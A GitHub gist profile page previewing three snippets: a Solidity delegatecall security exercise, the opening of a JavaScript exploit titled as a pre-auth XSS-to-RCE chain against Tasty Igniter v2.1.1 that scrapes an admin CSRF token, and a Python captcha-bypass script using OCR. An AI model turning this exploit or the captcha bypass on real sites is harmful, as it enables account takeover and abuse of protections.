Skip to content

Instantly share code, notes, and snippets.

View weev3's full-sized avatar
🤒
Out sick

weev3

🤒
Out sick
52 followers · 0 following
View GitHub Profile
@weev3
weev3 / security...DelegateCall1.sol
Created August 2, 2022 11:38
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.8.12+commit.f00d7308.js&optimize=false&runs=200&gist=
pragma solidity <=0.8.13;
contract FibonacciLib {
uint public start;
uint public calculatedFibNumber;
function setStart(uint _start) public {
start = _start;
}
@weev3
weev3 / exploit.js
Last active April 1, 2021 12:47
Tasty Igniter v2.1.1 pre-auth xss to RCE
var mailurl = "http://localhost/laravel/tasty/setup-master/admin/settings/edit/mail"
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
regex = /\"csrf-token\" content\=\"([A-Za-z0-9 _]*)\"/;
content = this.responseText;
var csrftoken = content.match(regex)[1]
exploit(csrftoken,"");
}
@weev3
weev3 / test.py
Created May 24, 2017 18:50 — forked from christianroman/test.py
Bypass Captcha using 10 lines of code with Python, OpenCV & Tesseract OCR engine
import cv2.cv as cv
import tesseract
gray = cv.LoadImage('captcha.jpeg', cv.CV_LOAD_IMAGE_GRAYSCALE)
cv.Threshold(gray, gray, 231, 255, cv.CV_THRESH_BINARY)
api = tesseract.TessBaseAPI()
api.Init(".","eng",tesseract.OEM_DEFAULT)
api.SetVariable("tessedit_char_whitelist", "0123456789abcdefghijklmnopqrstuvwxyz")
api.SetPageSegMode(tesseract.PSM_SINGLE_WORD)
tesseract.SetCvImage(gray,api)
print api.GetUTF8Text()